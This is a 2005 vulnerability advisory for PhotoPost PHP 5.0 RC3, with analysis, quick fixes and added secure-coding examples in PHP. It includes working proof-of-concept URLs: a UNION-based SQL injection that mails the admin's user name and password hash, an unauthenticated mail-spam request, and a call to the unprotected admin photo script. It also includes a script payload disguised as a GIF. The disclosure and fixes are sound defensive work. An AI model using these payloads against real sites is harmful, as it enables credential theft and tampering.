
PhotoPost PHP 5.0 RC3, and later, multiple vulnerabilities



  PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities

  March 05 2005

  For your consideration.
  
  1. BACKGROUND
     PhotoPost is a popular commercial image publishing software.
     Everyone loves showing off their photos! Add PhotoPost to your site, or
     let us install it for you, and your visitors will be able to upload their
     photos to galleries on your site and interact in photo discussions. Join
     the 3,500+ sites that are already using PhotoPost and add a fun new
     dimension to your website.
     ....
     Yeah, it is just that bad.
     
  2. IMPACT
      A series of vulnerabilities allows a remote attacker
      - to get arbitrary data from PhotoPost tables (*)
      - to spam the administrator's mailbox
      - to steal sessions
      - to manipulate photographs
      - to XSS PhotoPost
      - to upload "image" files with arbitrary content
        (*) only under some configurations; described in detail in 4.1
        
  3. SEVERITY
      HIGH

  4. ANALYSIS
  
     4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES
             PhotoPost (PP from here on) is built on a highly risky principle
          of filtering input data based on magic_quotes. Quoting the PHP
          manual:
          =------
          magic_quotes_gpc boolean
                 Sets the magic_quotes state for GPC (Get/Post/Cookie)
                 operations. When magic_quotes are on, all ' (single-quote),
                 " (double quote), \ (backslash) and NUL's are escaped with a
                 backslash automatically.
          =------
             Turning magic_quotes on is neglected by a large percentage of PP
          users. It is a bad idea to rely on user action in a matter as
          essential as data filtering; the code should instead escape values
          itself with the mysql_escape_string/mysql_real_escape_string
          functions. Adding a few lines of native code would definitely have
          removed that "human" factor.
             Many users have no idea what magic_quotes is, what it is for, or
          where their negligence will lead them, even despite the warning PP
          gives while installing. Looking at the architecture PP is built
          upon, it becomes clear that PP should not even attempt to install
          itself on systems with magic_quotes turned off.
          
          PROOF of CONCEPT
          To see whether PP is running in the environment with magic quotes
          turned off one might use the following URL:
          
http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@xxxxxxxxx",%20concat(username,"%20",%20password)%20from%20users
          no login required
          
             * replace yourmail@xxxxxxxxx with your email. If magic quotes
             are turned off you'll get the admin's MD5 hash and user name in
             your mail.

             * this URL might not work if the site runs an old MySQL version:
             =---
             UNION is used to combine the result from many SELECT statements
             into one result set. UNION is available from MySQL 4.0.0 on
             .....
             =---
             UNION is the only way to effectively exploit PHP based queries,
             due to the protection mysql_query provides: it was clever of the
             PHP developers not to allow multiple queries separated by ';'.
             
           QUICK FIX
            .htaccess
              php_value magic_quotes_gpc 1

             
     4.2  CODING NEGLIGENCE
          Analysis of query (I) leads to yet another security issue with PP.
          It has plenty of unsafe queries like

          "SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users
          WHERE userid=$uid"

          Notice that the database field userid is compared with $uid.
          $uid is supplied by the user, so its content is arbitrary, and
          still there are no quotes, no is_alpha, no intval check, nothing of
          the kind. Looking at the code at random shows that PP does the
          checking from time to time, but the rule is not universal.

          Even if magic_quotes were turned on it might be possible to devise
          a query that passes through one way or another and gets the data
          posted to your mail anyway. But the example query (I) won't do it;
          it is only constructed to pass the several conditions that stand
          before 'send' is invoked.
          
          QUICK FIX
            .htaccess
              php_value magic_quotes_gpc 1
            It will at least make it more difficult.
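          An added example (not PhotoPost's code) covering the escaping point
          of 4.1 and the unchecked $uid of 4.2: the unsafe query quoted above
          beside two forms that do not depend on magic_quotes at all. It
          assumes a PDO connection $db and that $prefix carries the configured
          value of $Globals['pp_db_prefix'].

```php
<?php
// Added example, not PhotoPost code. $prefix stands for the configured
// $Globals['pp_db_prefix'] (a config value, never user input); $db is an
// assumed PDO connection. Neither function relies on magic_quotes_gpc.

// As shipped (reconstructed from the advisory): $uid is pasted into the SQL
// text, so with magic_quotes off a crafted value rewrites the statement.
//   "SELECT joindate,email,username FROM {$prefix}users WHERE userid=$uid"

// Fix 1: userid is a numeric column, so only a plain unsigned integer is
// accepted and it is cast before the query is built. A value such as
// "0 union select ..." is rejected before any SQL exists.
function lookup_user_by_id(PDO $db, string $prefix, $uid): ?array
{
    if (!ctype_digit((string) $uid)) {
        return null;                       // not a plain unsigned integer
    }
    $uid = (int) $uid;
    if ($uid <= 0) {
        return null;                       // no such user id
    }
    $stmt = $db->query(
        "SELECT joindate,email,username FROM {$prefix}users WHERE userid=$uid"
    );
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Fix 2: a prepared statement. The value travels separately from the SQL
// text, so quoting rules never apply; this is the form for string columns
// (username, verifykey) where an integer cast is not possible.
function lookup_user_by_name(PDO $db, string $prefix, string $username): ?array
{
    $stmt = $db->prepare(
        "SELECT joindate,email,username FROM {$prefix}users WHERE username = ?"
    );
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```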
            
     4.3  SPAMMING THE ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT
          PP doesn't always check whether the user is authorized. Even though,
          as in this particular case, there is a login attempt, PP does not
          act on its outcome.

          The other problem is that PP does not care at all how many events
          were served, say mail sendings, how often, or how many authorization
          attempts were made. It is a lack of policy; combined, this could
          lead to spam.
          
          PROOF of CONCEPT
          
http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1
          no login required

          using this URL one may spam the administrator's email with an
          arbitrary number of letters, and PP won't even try to stop it

          QUICK FIX
             adding
             if ($User['userid'] == "") {
                 diewell( $Globals['pp_lang']['noreg'] );
             }
             after authenticate() is invoked, in the if ($action ==
             "reportpost") section, should fix the problem with unauthorized
             users.

             But it won't fix the problem in general: anyone who is
             authorized will still be able to spam the administrator.
             
          
     4.4  MANIPULATING USER PHOTOGRAPHS
          The problem is related to adm-photo.php: unlike all the other
          administrator scripts, it doesn't require "adm-inc.php".
          adm-inc.php has a built-in check that won't allow anybody except
          the administrator to pass further. That fact opens the door to the
          set of administrator functions built into adm-photo.php for
          everyone.

          As an example I decided to construct a URL that would rebuild
          thumbnails for a picture with a given PID (in our case it is 1),
          namely - it will rotate it clockwise.

          PROOF of CONCEPT
          
http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw
          no login required

          I'm not sure it is not one of the "features", but it looks like
          no one but the admin should be allowed to do this job.

          QUICK FIX
           I believe adding
           require "adm-inc.php";
           will solve the problem.
           

     4.5 INSERTING ARBITRARY HTML CODE

          XSS1
      
          And finally, there is XSS (cross-site scripting) in PP.

          function check_tags($data, $allowed){
              $data = preg_replace("/<(.*?)>/e",
                  "process_tag(stripslashes('\\1'), \$allowed)",
                  $data);
              $data = str_replace('javascript:','#',$data);
              return $data;
          }

         I won't comment on it. It is a very, very bad habit to check for
         javascript: this way.

         In short, it is possible to form the data so that PP accepts a
         given URL and then "checks" it for javascript using only this lame
         rule.

         XSS2
             PP doesn't check the biography field 'editbio' in the user
             profile, so it can easily contain arbitrary HTML code, tags and
             javascript; when the personal information is viewed, the session
             might be stolen.

         QUICK FIX
         None
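         An added example (not PhotoPost's code) for both XSS1 and XSS2: a
         replacement for check_tags() that escapes everything first and then
         re-enables only whitelisted tags, keeping href on <a> solely for
         http(s) URLs, instead of deleting the literal text "javascript:".
         process_tag() from the original is not used; for the 'editbio' field
         it is called with an empty whitelist so no markup survives.

```php
<?php
// Added example, not PhotoPost code: strict replacement for check_tags().
// Everything is entity-encoded first; only tags listed in $allowed are
// turned back into markup, with all attributes dropped except an http(s)
// href on <a>. Call with $allowed = [] for fields such as 'editbio'.
function check_tags_strict(string $data, array $allowed): string
{
    $allowed = array_map('strtolower', $allowed);
    // Every < > " ' & becomes an entity, so anything not explicitly
    // re-allowed below is displayed as text instead of being parsed.
    $out = htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
    return preg_replace_callback(
        '#&lt;(/?)([a-z]+)(.*?)&gt;#i',
        function (array $m) use ($allowed): string {
            $tag = strtolower($m[2]);
            if (!in_array($tag, $allowed, true)) {
                return $m[0];                   // stays escaped text
            }
            if ($m[1] === '/' || $tag !== 'a') {
                return "<{$m[1]}{$tag}>";        // all attributes dropped
            }
            // <a ...>: keep href only, and only for absolute http(s) URLs.
            // The value is already entity-encoded, so it is safe to emit
            // inside a quoted attribute as is. URLs containing '&' are
            // rejected on purpose (conservative, not a security issue).
            if (preg_match('#href=&quot;([^&]*)&quot;#i', $m[3], $h)
                && preg_match('#^https?://#i', $h[1])) {
                return '<a href="' . $h[1] . '">';
            }
            return '<a>';
        },
        $out
    );
}
```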

     4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT
      
          PP allows uploading any file disguised as an image. It neither
          checks the file nor tries to normalize it to some internal
          standard. Basically one uploads JS as an image into PP, then spreads
          a DIRECT link to the uploaded image. IE will execute the JS from the
          broken image transparently.
          
          PROOF OF CONCEPT
          injected.gif
          <script>
           document.write('<img src=http://www.microsoft.com/h/en-us/i/ts_1024_25_BillGWebcastB.jpg>');
            alert('Injected');
          </script>

          PP SHOULD 'load as a picture' and then, in case of success, 'save
          as a picture' all the uploaded images, to guarantee that the file
          content is at least image/gif.
          
         QUICK FIX
         None
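         An added example (not PhotoPost's code) of the "load as a picture,
         then save as a picture" step the text asks for, using the GD
         extension: the upload is rejected unless it decodes as a GIF, JPEG or
         PNG, and the stored file is written from the decoded pixels only. The
         parameter names $tmp and $dest are assumptions.

```php
<?php
// Added example, not PhotoPost code. Requires the GD extension. $tmp is the
// uploaded temp file (e.g. $_FILES['userfile']['tmp_name']) and $dest the
// gallery path without extension; both names are assumed.
function store_image_reencoded(string $tmp, string $dest): bool
{
    // 1. Reject anything whose header is not a real raster image. A file
    //    that only holds <script>...</script> fails here already.
    $info = @getimagesize($tmp);
    if ($info === false) {
        return false;
    }
    $allowed = [
        IMAGETYPE_GIF  => 'gif',
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
    ];
    if (!isset($allowed[$info[2]])) {
        return false;                      // not a type we serve as an image
    }
    // 2. Decode the pixels. Bytes that are not part of the image data,
    //    including anything appended after a valid image, are discarded.
    $img = @imagecreatefromstring(file_get_contents($tmp));
    if ($img === false) {
        return false;
    }
    // 3. Write a fresh file from the decoded pixels; the stored file now
    //    contains only what the encoder emits, never the uploader's bytes.
    $target = $dest . '.' . $allowed[$info[2]];
    switch ($info[2]) {
        case IMAGETYPE_GIF:
            $ok = imagegif($img, $target);
            break;
        case IMAGETYPE_JPEG:
            $ok = imagejpeg($img, $target, 90);
            break;
        default:
            $ok = imagepng($img, $target);
            break;
    }
    imagedestroy($img);
    return $ok;
}
```

         Re-encoding also drops anything the decoder did not understand, such
         as GIF animation frames beyond the first; serving the gallery
         directory with a fixed image Content-Type removes the browser's
         reason to sniff the content in the first place.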
         
 5.  VENDOR STATUS
 
     Informed a week ago by mail, with no response.
     Next time, if I have time to explore the sources again, I will not inform
     this particular vendor. When this article was posted in the private PP
     forum it was removed almost immediately.

     Today I got a letter (not personal) about a new 5.01 release. When
     looking at the fixed files I saw that it really fixes some of the issues
     with PP that were described in this article. In particular, the e-mail
     bypass will not work in 5.01 under any condition.

     I believe you may easily find the vulnerable versions, as well as
     some of the source code :-), with google.com
     
      
-- 
Best regards